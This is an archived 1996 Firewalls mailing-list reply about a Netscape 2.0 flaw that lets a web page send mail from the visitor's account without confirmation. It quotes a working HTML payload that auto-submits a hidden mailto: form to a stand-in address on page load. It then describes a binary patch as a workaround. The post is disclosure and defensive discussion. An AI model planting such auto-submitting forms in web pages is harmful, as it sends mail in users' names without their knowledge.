Firewalls: RE: BoS: Netscape2.0 sends mail to the world without authority

Firewalls
(March 1996)

Indexed By Thread: [Previous] [Next]

Subject:	RE: BoS: Netscape2.0 sends mail to the world without authority
From:	Tim Linnanvirta <tim @ clinet . fi>
Date:	Wed, 13 Mar 1996 18:35:26 +0200 (EET)
To:	firewalls @ GreatCircle . COM


> I noticed, while loading a web page, that there was a mailto: URL active
> (using the "Easter Egg" Ctrl-Alt-T popup to see active URLs).  Sure enough,
> after I cancelled that and examined the source, I saw something like this:
> 
> <body onLoad="document.mailme.submit()">
> <form method=post name="mailme" 
> action="mailto:nasty @
 secret .
 org?subject=gotcha">
> <input type=hidden name="hi" value="there">
> </form>
> 
> A quick test on my local machine shows that this will send a message to
> nasty @
 secret .
 org with the subject gotcha and the body "hi=there".


	I tested this on SunOS 4.1.3, and it sure works: the Netscape
	onLoad function will send mail using your account name and
	without asking for confirmation or even informing you.

	I looked at the Netscape binary with od -s and emacs. The
	string "onload" (all lower case) occurs 2 times on itself,
	between null characters.  When I patched it, changing the
	first occurrence to "onxxad", the resulting binary did not any
	more obey the "onLoad" directive and did not obey the "onxxad"
	directive either.  When I changed both occurrences of "onload"
	to "onxxoad", the resulting binary did not obey the "onLoad"
	directive, but it did obey the "onxxad" directive.

	Note that the Netscape license agreement forbids you to :

	"... * modify, translate, reverse engineer, decompile, disassemble
	       (except to the extent applicable laws specifically prohibit such
	       restriction), or create derivative works based on the Software; ..."

	So if you patch Netscape to prevent it forging your mail,  you 
	might be breaking the license.  And of course this kind of binary
	patching may easily break something else.  At least it will break
	any WWW pages which use the onLoad directive for some other,
	more legitimate purpose.

	So do not do it unless you know exactly what you are doing,
	and do not blame me if it does not work or leads to a disaster!

	If you are really concerned about this thing,  consider sending 
	e-mail to Netscape Communications Corporation,  explaining to them 
	the reasons why you think Netscape should not send mail using your
	machine, address and account without asking for confirmation.

		- Tim

Indexed By Date	Previous:	Re: IP/IPX gateways From: Ken Hardy <ken @ bridge . com>
Indexed By Date	Next:	Re: Netscape2.0 sends mail to the world without authority (fwd) From: Steve Gaarder <gaarder @ actech . com>
Indexed By Thread	Previous:	Re: Raptor Product and other comparison of firewalls From: Brien Wheeler <bwheeler @ raptor . com>
Indexed By Thread	Next:	Dawg Confesses: I did Princess Dianna. From: Sick Puppy <sikpuppy @ maestro . com>